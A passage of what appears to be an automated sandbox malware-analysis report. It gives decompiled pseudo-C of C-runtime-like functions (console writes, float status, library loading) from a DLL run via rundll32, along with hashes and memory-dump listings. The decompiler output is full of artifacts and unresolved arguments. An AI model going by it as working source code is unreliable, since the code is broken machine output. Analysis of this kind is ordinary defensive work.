                0x7ffa535f3afe
                0x7ffa535f3b00
                0x7ffa535f3b05
                0x7ffa535f3b0c
                0x7ffa535f3b18
                0x7ffa535f3b1a
                0x7ffa535f3b28
                0x7ffa535f3b3d

                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction ID: 972d0482d3329e393c88d519c077d3490ce639df4d23031a2b85a65582a6c7b7
                • Opcode Fuzzy Hash: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction Fuzzy Hash: B5A1D5A2B29B824DFB218BA1945037D669BAF82BA4F4C9631DB5D277C5DF3CE444C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F4378 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00007FFA7FFA535F4378(signed int __ecx, void* __edi, void* __esi, void* __ebp, void* __fp0, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
				void* _v64;
				signed long long _v72;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rsi;
				void* __rbp;
				void* _t75;
				void* _t88;
				void* _t89;
				long _t94;
				unsigned int _t95;
				intOrPtr _t103;
				signed int _t124;
				void* _t127;
				intOrPtr* _t156;
				intOrPtr _t159;
				unsigned long long _t165;
				signed int* _t167;
				intOrPtr _t170;
				signed short* _t180;
				unsigned int _t183;
				signed short* _t184;
				void* _t186;
				void* _t189;
				void* _t197;
				signed long long _t199;
				signed long long _t200;
				signed long long _t202;
				void* _t203;
				signed short* _t204;

				_t180 = __rdx;
				_t168 = __rbx;
				_t127 = __ebp;
				_a32 = __rbx;
				r15d = r8d;
				_t184 = __rdx;
				if (r8d != 0) goto 0x535f43a6;
				goto 0x535f4641;
				if (__rdx != 0) goto 0x535f43ca;
				E00007FFA7FFA535E8360(_t156);
				 *_t156 = 0;
				_t75 = E00007FFA7FFA535E8380(_t156);
				 *_t156 = 0x16;
				E00007FFA7FFA535E8260(_t75);
				goto 0x535f4641;
				r14d = r14d & 0x0000003f;
				_t199 = __ecx >> 6;
				_t202 = __ecx << 6;
				_v72 = _t199;
				_t170 =  *((intOrPtr*)(0x53754e50 + _t199 * 8));
				_t103 =  *((intOrPtr*)(_t170 + _t202 + 0x39));
				if (__rbx - 1 - 1 > 0) goto 0x535f4400;
				if (( !r15d & 0x00000001) == 0) goto 0x535f43ab;
				if (( *(_t170 + _t202 + 0x38) & 0x00000020) == 0) goto 0x535f4416;
				_t14 = _t180 + 2; // 0x2
				r8d = _t14;
				E00007FFA7FFA535F4CA8(0, 0x53754e50, __rbx, _t170, _t180, _t184, _t189);
				_v88 = _t183;
				if (E00007FFA7FFA535E4A88(r12d, 0x53754e50, _t170) == 0) goto 0x535f452b;
				_t159 =  *((intOrPtr*)(0x53754e50 + _t199 * 8));
				if (( *(0x53754e50 + _t202 + 0x38) & 0x00000080) == 0) goto 0x535f452b;
				E00007FFA7FFA535E8A30(r12d, __fp0, _t159, _t168, __r9);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x90)) + 0x138)) != _t183) goto 0x535f446c;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t199 * 8)) + _t202 + 0x39)) == dil) goto 0x535f452b;
				if (GetConsoleMode(??, ??) == 0) goto 0x535f452b;
				if (_t103 == 0) goto 0x535f450d;
				if (_t103 - 1 - 1 > 0) goto 0x535f45c8;
				_v104 = _v104 & 0;
				_t197 = _t184 + _t203;
				_t204 = _t184;
				_v100 = 0;
				if (_t184 - _t197 >= 0) goto 0x535f45be;
				r13d =  *_t204 & 0x0000ffff;
				if (E00007FFA7FFA535F4DA0(r13w & 0xffffffff, _t186) != r13w) goto 0x535f44fb;
				_v100 = 2;
				if (r13w != 0xa) goto 0x535f44f0;
				r13d = 0xd;
				if (E00007FFA7FFA535F4DA0(r13d, _t186) != r13w) goto 0x535f44fb;
				_v100 = 2;
				if ( &(_t204[1]) - _t197 >= 0) goto 0x535f4504;
				goto 0x535f44b5;
				_v104 = GetLastError();
				_t200 = _v72;
				goto 0x535f45be;
				r9d = r15d;
				_t88 = E00007FFA7FFA535F3CEC(r12d, __fp0, _t168,  &_v104, _t184, __r9);
				asm("movsd xmm0, [eax]");
				_t124 =  *0x7FFA53754E58;
				goto 0x535f45c3;
				if (( *( *((intOrPtr*)(0x53754e50 + _t200 * 8)) + _t202 + 0x38) & 0x00000080) == 0) goto 0x535f458b;
				if (3 == 0) goto 0x535f4577;
				if (3 == 0) goto 0x535f4563;
				if (2 != 1) goto 0x535f45c8;
				r9d = r15d;
				_t89 = E00007FFA7FFA535F3FFC(_t88, 3, 2, r12d, _t168,  &_v104, _t186, _t184);
				goto 0x535f451f;
				r9d = r15d;
				E00007FFA7FFA535F4118(_t89, 2, r12d, __esi, _t127, _t168,  &_v104, _t186, _t184);
				goto 0x535f451f;
				r9d = r15d;
				E00007FFA7FFA535F3EF4(2, r12d, _t124, _t168,  &_v104, _t186, _t184);
				goto 0x535f451f;
				_v104 = _v104 & _t124;
				_v120 = _v120 & 0x53754e50;
				r8d = r15d;
				_v100 = 0x53754e50;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x535f45bb;
				_t94 = GetLastError();
				_v104 = _t94;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t165 = _v88 >> 0x20;
				if (_t94 != 0) goto 0x535f463c;
				_t95 = _v88;
				if (_t95 == 0) goto 0x535f4608;
				if (_t95 != 5) goto 0x535f45fb;
				E00007FFA7FFA535E8380(_t165);
				 *_t165 = 9;
				E00007FFA7FFA535E8360(_t165);
				 *_t165 = 5;
				goto 0x535f43c2;
				E00007FFA7FFA535E8310(_t165, _t168,  *((intOrPtr*)( &_v104 + _t202 + 0x28)));
				goto 0x535f43c2;
				_t167 =  *((intOrPtr*)(0x53754e50 + _t200 * 8));
				if (( *(0x53754e50 + _t202 + 0x38) & 0x00000040) == 0) goto 0x535f4624;
				if ( *_t184 == 0x1a) goto 0x535f439f;
				E00007FFA7FFA535E8380(_t167);
				 *0x53754e50 = 0x1c;
				E00007FFA7FFA535E8360(_t167);
				 *_t167 =  *_t167 & 0x00000000;
				goto 0x535f43c2;
				return _v84 - _v96;
			}





































                0x7ffa535f4378
                0x7ffa535f4378
                0x7ffa535f4378
                0x7ffa535f4378
                0x7ffa535f4391
                0x7ffa535f4397
                0x7ffa535f439d
                0x7ffa535f43a1
                0x7ffa535f43a9
                0x7ffa535f43ab
                0x7ffa535f43b0
                0x7ffa535f43b2
                0x7ffa535f43b7
                0x7ffa535f43bd
                0x7ffa535f43c5
                0x7ffa535f43d4
                0x7ffa535f43db
                0x7ffa535f43df
                0x7ffa535f43e3
                0x7ffa535f43e7
                0x7ffa535f43eb
                0x7ffa535f43f5
                0x7ffa535f43fe
                0x7ffa535f4406
                0x7ffa535f440d
                0x7ffa535f440d
                0x7ffa535f4411
                0x7ffa535f4419
                0x7ffa535f4424
                0x7ffa535f4431
                0x7ffa535f443b
                0x7ffa535f4441
                0x7ffa535f4454
                0x7ffa535f4466
                0x7ffa535f4488
                0x7ffa535f4490
                0x7ffa535f4497
                0x7ffa535f449d
                0x7ffa535f44a0
                0x7ffa535f44a6
                0x7ffa535f44a9
                0x7ffa535f44af
                0x7ffa535f44b5
                0x7ffa535f44c6
                0x7ffa535f44cb
                0x7ffa535f44d3
                0x7ffa535f44d5
                0x7ffa535f44e7
                0x7ffa535f44eb
                0x7ffa535f44f7
                0x7ffa535f44f9
                0x7ffa535f4501
                0x7ffa535f4504
                0x7ffa535f4508
                0x7ffa535f450d
                0x7ffa535f451a
                0x7ffa535f451f
                0x7ffa535f4523
                0x7ffa535f4526
                0x7ffa535f453c
                0x7ffa535f4543
                0x7ffa535f4548
                0x7ffa535f454d
                0x7ffa535f454f
                0x7ffa535f455c
                0x7ffa535f4561
                0x7ffa535f4563
                0x7ffa535f4570
                0x7ffa535f4575
                0x7ffa535f4577
                0x7ffa535f4584
                0x7ffa535f4589
                0x7ffa535f4594
                0x7ffa535f4599
                0x7ffa535f459e
                0x7ffa535f45a4
                0x7ffa535f45b0
                0x7ffa535f45b2
                0x7ffa535f45b8
                0x7ffa535f45be
                0x7ffa535f45c3
                0x7ffa535f45cc
                0x7ffa535f45d2
                0x7ffa535f45d4
                0x7ffa535f45d9
                0x7ffa535f45de
                0x7ffa535f45e0
                0x7ffa535f45e5
                0x7ffa535f45eb
                0x7ffa535f45f0
                0x7ffa535f45f6
                0x7ffa535f45fe
                0x7ffa535f4603
                0x7ffa535f460f
                0x7ffa535f4619
                0x7ffa535f461e
                0x7ffa535f4624
                0x7ffa535f4629
                0x7ffa535f462f
                0x7ffa535f4634
                0x7ffa535f4637
                0x7ffa535f4658

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction ID: e79e2f86366f569ae94da9adcb03faac9333a13f018f85a3e66852ab38498644
                • Opcode Fuzzy Hash: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction Fuzzy Hash: 028192E2E38F124DF712AB65D4406BD26AABBC6B54F48A135DE0E23695CF3CE465C310
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EBAB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                Download Yara Rule
                C-Code - Quality: 44%
                			E00007FFA7FFA535EBAB0(signed int __ecx, void* __rax, long long __rbx, signed long long __rcx, void* __rdx, signed int __r8) {
				signed short _t34;
				unsigned int _t37;
				unsigned int _t38;
				void* _t55;
				unsigned int _t56;
				void* _t59;
				void* _t64;
				signed int _t70;
				signed int _t71;
				void* _t74;
				signed int _t75;
				void* _t76;
				signed int _t80;
				signed int _t83;
				signed long long _t88;
				signed long long _t93;
				void* _t105;
				void* _t106;
				void* _t111;
				void* _t113;
				void* _t115;

				_t93 = __rcx;
				 *((long long*)(_t105 + 0x10)) = __rbx;
				_t106 = _t105 - 0x30;
				r14d = 0;
				asm("movaps [esp+0x20], xmm6");
				r12d = __ecx;
				_t2 = _t113 + 0x10; // 0x10
				r13d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x535ebaf9;
				if (r15b >= 0) goto 0x535ebaf9;
				E00007FFA7FFA535EC21C(__rax, __rcx);
				goto 0x535ebcd9;
				_t70 = 0x00000004 & r12b;
				if (_t70 == 0) goto 0x535ebb17;
				asm("dec ecx");
				if (_t70 >= 0) goto 0x535ebb17;
				E00007FFA7FFA535EC21C(__rax, _t93);
				goto 0x535ebcd9;
				_t71 = dil & r12b;
				if (_t71 == 0) goto 0x535ebbd5;
				asm("dec ecx");
				if (_t71 >= 0) goto 0x535ebbd5;
				E00007FFA7FFA535EC21C(__rax, _t93);
				_t88 = __r8 & _t93;
				if (_t71 == 0) goto 0x535ebba2;
				if (_t88 == 0x2000) goto 0x535ebb8a;
				if (_t88 == 0x4000) goto 0x535ebb72;
				_t74 = _t88 - _t93;
				if (_t74 != 0) goto 0x535ebbcd;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x8605a]");
				asm("movsd xmm0, [0x867f2]");
				if (_t74 > 0) goto 0x535ebbc9;
				goto 0x535ebbc2;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x86042]");
				if (_t74 > 0) goto 0x535ebbb0;
				asm("movsd xmm0, [0x867d8]");
				goto 0x535ebbc2;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x8602a]");
				if (_t74 <= 0) goto 0x535ebbba;
				asm("movsd xmm0, [0x867c0]");
				goto 0x535ebbc9;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0x86012]");
				if (_t74 <= 0) goto 0x535ebbba;
				asm("movsd xmm0, [0x86798]");
				goto 0x535ebbc9;
				asm("movsd xmm0, [0x8678e]");
				asm("xorps xmm0, [0x85597]");
				asm("movsd [esi], xmm0");
				goto 0x535ebcd9;
				_t75 = r12b & 0x00000002;
				if (_t75 == 0) goto 0x535ebcd9;
				asm("dec ecx");
				if (_t75 >= 0) goto 0x535ebcd9;
				asm("movsd xmm0, [edx]");
				asm("xorps xmm6, xmm6");
				_t64 =  !=  ? 1 : r14d;
				asm("ucomisd xmm0, xmm6");
				if (_t75 != 0) goto 0x535ebc0c;
				if (_t75 != 0) goto 0x535ebc0c;
				goto 0x535ebcca;
				_t34 = E00007FFA7FFA535ED340(r12b & r13b, 0x6000, _t59, _t75, _t106 + 0x70, _t115, _t113, _t111);
				_t55 =  *((intOrPtr*)(_t106 + 0x70)) + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t76 = _t55 - 0xfffffbce;
				if (_t76 >= 0) goto 0x535ebc3c;
				asm("mulsd xmm0, xmm6");
				goto 0x535ebcc6;
				r8d = r14d;
				asm("comisd xmm6, xmm0");
				r8b = _t76 > 0;
				 *(_t106 + 0x8e) = _t34 & 0x0000000f | r13w;
				if (_t55 - 0xfffffc03 >= 0) goto 0x535ebcb1;
				_t37 =  *(_t106 + 0x88);
				_t56 =  *(_t106 + 0x8c);
				if ((dil & _t37) == 0) goto 0x535ebc8a;
				_t67 =  ==  ? 1 : 1;
				_t38 = _t37 >> 1;
				 *(_t106 + 0x88) = _t38;
				_t80 = dil & _t56;
				if (_t80 == 0) goto 0x535ebca3;
				asm("bts eax, 0x1f");
				 *(_t106 + 0x88) = _t38;
				if (_t80 != 0) goto 0x535ebc80;
				 *(_t106 + 0x8c) = _t56 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (r8d == 0) goto 0x535ebcc6;
				asm("xorps xmm0, [0x8549a]");
				asm("movsd [esi], xmm0");
				_t82 =  ==  ? 1 : 1;
				if (( ==  ? 1 : 1) == 0) goto 0x535ebcd6;
				E00007FFA7FFA535EC21C( *(_t106 + 0x88) >> 0x30, _t111);
				_t83 = r13b & r12b;
				if (_t83 == 0) goto 0x535ebcf2;
				asm("dec ecx");
				if (_t83 >= 0) goto 0x535ebcf2;
				E00007FFA7FFA535EC21C( *(_t106 + 0x88) >> 0x30, _t111);
				asm("movaps xmm6, [esp+0x20]");
				r14b = (__ecx & 0) == 0;
				return r14d;
			}
























                0x7ffa535ebab0
                0x7ffa535ebab0
                0x7ffa535ebac0
                0x7ffa535ebac4
                0x7ffa535ebac7
                0x7ffa535ebad7
                0x7ffa535ebada
                0x7ffa535ebada
                0x7ffa535ebae1
                0x7ffa535ebae6
                0x7ffa535ebaec
                0x7ffa535ebaf4
                0x7ffa535ebafe
                0x7ffa535ebb01
                0x7ffa535ebb03
                0x7ffa535ebb08
                0x7ffa535ebb0a
                0x7ffa535ebb12
                0x7ffa535ebb1c
                0x7ffa535ebb1f
                0x7ffa535ebb25
                0x7ffa535ebb2a
                0x7ffa535ebb33
                0x7ffa535ebb40
                0x7ffa535ebb43
                0x7ffa535ebb4b
                0x7ffa535ebb53
                0x7ffa535ebb55
                0x7ffa535ebb58
                0x7ffa535ebb5a
                0x7ffa535ebb5e
                0x7ffa535ebb66
                0x7ffa535ebb6e
                0x7ffa535ebb70
                0x7ffa535ebb72
                0x7ffa535ebb76
                0x7ffa535ebb7e
                0x7ffa535ebb80
                0x7ffa535ebb88
                0x7ffa535ebb8a
                0x7ffa535ebb8e
                0x7ffa535ebb96
                0x7ffa535ebb98
                0x7ffa535ebba0
                0x7ffa535ebba2
                0x7ffa535ebba6
                0x7ffa535ebbae
                0x7ffa535ebbb0
                0x7ffa535ebbb8
                0x7ffa535ebbba
                0x7ffa535ebbc2
                0x7ffa535ebbc9
                0x7ffa535ebbd0
                0x7ffa535ebbd5
                0x7ffa535ebbd9
                0x7ffa535ebbdf
                0x7ffa535ebbe4
                0x7ffa535ebbea
                0x7ffa535ebbf7
                0x7ffa535ebbfa
                0x7ffa535ebbfd
                0x7ffa535ebc01
                0x7ffa535ebc03
                0x7ffa535ebc07
                0x7ffa535ebc11
                0x7ffa535ebc1a
                0x7ffa535ebc20
                0x7ffa535ebc29
                0x7ffa535ebc2f
                0x7ffa535ebc31
                0x7ffa535ebc37
                0x7ffa535ebc44
                0x7ffa535ebc47
                0x7ffa535ebc4b
                0x7ffa535ebc5b
                0x7ffa535ebc69
                0x7ffa535ebc6b
                0x7ffa535ebc79
                0x7ffa535ebc83
                0x7ffa535ebc87
                0x7ffa535ebc8a
                0x7ffa535ebc8c
                0x7ffa535ebc93
                0x7ffa535ebc96
                0x7ffa535ebc98
                0x7ffa535ebc9c
                0x7ffa535ebca8
                0x7ffa535ebcaa
                0x7ffa535ebcb1
                0x7ffa535ebcbd
                0x7ffa535ebcbf
                0x7ffa535ebcc6
                0x7ffa535ebcca
                0x7ffa535ebccc
                0x7ffa535ebcd1
                0x7ffa535ebcd9
                0x7ffa535ebcdc
                0x7ffa535ebcde
                0x7ffa535ebce3
                0x7ffa535ebcea
                0x7ffa535ebcf2
                0x7ffa535ebcfe
                0x7ffa535ebd14

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction ID: ddc47afb5f21660ea1829566c097fa29323be1bd51b716aa6a85a46be5e7c1d3
                • Opcode Fuzzy Hash: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction Fuzzy Hash: E551D926D2CF5A49F2229F34A45037A626BBFC2351F0CD275DA5E365D4EF3CA445A600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F3CEC Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                Download Yara Rule
                C-Code - Quality: 25%
                			E00007FFA7FFA535F3CEC(signed int __edx, void* __fp0, long long __rbx, signed long long __rcx, long long __r8, void* __r9, long long _a8) {
				signed long long _v72;
				char _v80;
				intOrPtr _v87;
				char _v88;
				long long _v96;
				long long _v104;
				int _v108;
				intOrPtr _v112;
				short _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				intOrPtr _v144;
				signed int _v152;
				int _t80;
				long _t85;
				signed char _t86;
				void* _t99;
				signed long long _t117;
				long* _t126;
				signed long long _t128;
				void* _t136;
				intOrPtr _t137;
				signed long long _t141;
				void* _t144;
				signed long long _t147;
				void* _t149;
				void* _t157;
				void* _t158;
				signed long long _t162;

				_t128 = __rcx;
				_a8 = __rbx;
				_t117 =  *0x53754140; // 0x9bd95a2971b4
				_v72 = _t117 ^ _t149 - 0x00000080;
				r12d = r9d;
				_t162 = __edx >> 6;
				_t147 = __edx << 6;
				_v96 = __r8;
				_t126 = __rcx;
				_t158 = _t157 + __r8;
				_v104 = 0x53754e50;
				_v108 = GetConsoleCP();
				 *__rcx = _t136;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t158 >= 0) goto 0x535f3eca;
				r13b =  *((intOrPtr*)(__r8));
				_v120 = 0;
				_t137 =  *((intOrPtr*)(0x53754e50 + _t162 * 8));
				_t86 =  *(_t137 + _t147 + 0x3d);
				if ((_t86 & 0x00000004) == 0) goto 0x535f3d9f;
				 *(_t137 + _t147 + 0x3d) = _t86 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t137 + _t147 + 0x3e));
				_v87 = r13b;
				goto 0x535f3de4;
				E00007FFA7FFA535ED520(_t86 & 0x000000fb, __fp0,  *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x28)), __rcx, __rcx,  &_v88, __r9);
				if (( *(0x53754e50 + _t128 * 2) & 0x00008000) == 0) goto 0x535f3ddb;
				if (__r8 - _t158 >= 0) goto 0x535f3eaa;
				r8d = 2;
				if (E00007FFA7FFA535EFBE0( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x28)),  &_v120, __r8) == 0xffffffff) goto 0x535f3eca;
				_t144 = __r8 + 1;
				goto 0x535f3df6;
				r8d = 1;
				if (E00007FFA7FFA535EFBE0( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x28)),  &_v120, _t144) == 0xffffffff) goto 0x535f3eca;
				_v128 = _v128 & 0x00000000;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 =  &_v80;
				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t80;
				if (_t80 == 0) goto 0x535f3eca;
				_v152 = _v152 & 0x00000000;
				_t141 =  &_v80;
				r8d = _t80;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x535f3ec2;
				_t126[1] = _t126[2] - _v96 + _t99;
				if (_v112 - r14d < 0) goto 0x535f3eca;
				if (r13b != 0xa) goto 0x535f3ea2;
				_t50 = _t141 + 0xd; // 0xd
				_v152 = _t141;
				_t52 = _t141 + 1; // 0x1
				r8d = _t52;
				_v116 = _t50;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x535f3ec2;
				if (_v112 - 1 < 0) goto 0x535f3eca;
				_t126[2] = _t126[2] + 1;
				_t126[1] = _t126[1] + 1;
				goto 0x535f3d60;
				 *((char*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x3e)) =  *((intOrPtr*)(_t144 + 1));
				 *( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x3d) =  *( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x3d) | 0x00000004;
				_t126[1] = _t126[1] + 1;
				goto 0x535f3eca;
				_t85 = GetLastError();
				 *_t126 = _t85;
				E00007FFA7FFA535F51E0();
				return _t85;
			}

































                0x7ffa535f3cec
                0x7ffa535f3cec
                0x7ffa535f3d06
                0x7ffa535f3d10
                0x7ffa535f3d21
                0x7ffa535f3d24
                0x7ffa535f3d2b
                0x7ffa535f3d32
                0x7ffa535f3d36
                0x7ffa535f3d39
                0x7ffa535f3d45
                0x7ffa535f3d51
                0x7ffa535f3d54
                0x7ffa535f3d5a
                0x7ffa535f3d60
                0x7ffa535f3d66
                0x7ffa535f3d70
                0x7ffa535f3d74
                0x7ffa535f3d78
                0x7ffa535f3d7f
                0x7ffa535f3d88
                0x7ffa535f3d8c
                0x7ffa535f3d96
                0x7ffa535f3d99
                0x7ffa535f3d9d
                0x7ffa535f3d9f
                0x7ffa535f3db0
                0x7ffa535f3db5
                0x7ffa535f3dbb
                0x7ffa535f3dd0
                0x7ffa535f3dd6
                0x7ffa535f3dd9
                0x7ffa535f3ddb
                0x7ffa535f3df0
                0x7ffa535f3df6
                0x7ffa535f3e00
                0x7ffa535f3e0d
                0x7ffa535f3e13
                0x7ffa535f3e1d
                0x7ffa535f3e25
                0x7ffa535f3e2b
                0x7ffa535f3e30
                0x7ffa535f3e3e
                0x7ffa535f3e44
                0x7ffa535f3e48
                0x7ffa535f3e55
                0x7ffa535f3e5f
                0x7ffa535f3e66
                0x7ffa535f3e6c
                0x7ffa535f3e72
                0x7ffa535f3e75
                0x7ffa535f3e7a
                0x7ffa535f3e7a
                0x7ffa535f3e82
                0x7ffa535f3e94
                0x7ffa535f3e9a
                0x7ffa535f3e9c
                0x7ffa535f3e9f
                0x7ffa535f3ea5
                0x7ffa535f3eb0
                0x7ffa535f3eb8
                0x7ffa535f3ebd
                0x7ffa535f3ec0
                0x7ffa535f3ec2
                0x7ffa535f3ec8
                0x7ffa535f3ed4
                0x7ffa535f3ef3

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                • String ID:
                • API String ID: 3659116390-0
                • Opcode ID: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction ID: e3d35f6fcd6e256d735954e834aef5e91b0fb3d651fe4a3d538b3c1449825c07
                • Opcode Fuzzy Hash: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction Fuzzy Hash: 18518F72B24A5189F710CB65E4443AD3BBAFB86B98F089135DF4E676A8DF38D145C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535ED718 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 36%
                			E00007FFA7FFA535ED718(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				signed long long _t74;
				signed long long _t78;
				intOrPtr _t80;
				signed long long _t82;
				signed long long _t91;
				struct HINSTANCE__* _t96;
				signed long long _t97;
				long long _t103;
				void* _t107;
				signed long long _t111;
				signed long long _t113;
				signed long long _t116;
				struct HINSTANCE__* _t117;
				long _t120;
				void* _t123;
				WCHAR* _t125;

				 *((long long*)(_t107 + 8)) = __rbx;
				 *((long long*)(_t107 + 0x10)) = _t103;
				 *((long long*)(_t107 + 0x18)) = __rsi;
				r14d = __ecx;
				_t113 =  *0x53754140; // 0x9bd95a2971b4
				_t97 = _t96 | 0xffffffff;
				_t91 = _t113 ^  *(0x7ffa535e0000 + 0x1755f0 + _t123 * 8);
				asm("dec eax");
				if (_t91 == _t97) goto 0x535ed899;
				if (_t91 == 0) goto 0x535ed781;
				_t74 = _t91;
				goto 0x535ed89b;
				if (__r8 == __r9) goto 0x535ed82d;
				_t80 =  *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + __rsi * 8));
				if (_t80 == 0) goto 0x535ed7a1;
				if (_t80 == _t97) goto 0x535ed819;
				goto 0x535ed814;
				r8d = 0x800;
				LoadLibraryExW(_t125, _t123, _t120);
				if (_t74 != 0) goto 0x535ed7e2;
				if (GetLastError() != 0x57) goto 0x535ed7e0;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t82 = _t74;
				goto 0x535ed7e2;
				if (_t82 != 0) goto 0x535ed7fb;
				 *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + __rsi * 8)) = _t97;
				goto 0x535ed819;
				_t19 = 0x7ffa535e0000 + 0x175550 + __rsi * 8;
				_t78 =  *_t19;
				 *_t19 = _t82;
				if (_t78 == 0) goto 0x535ed814;
				FreeLibrary(_t117);
				if (_t82 != 0) goto 0x535ed86e;
				if (__r8 + 4 != __r9) goto 0x535ed78a;
				if (_t82 == 0) goto 0x535ed87e;
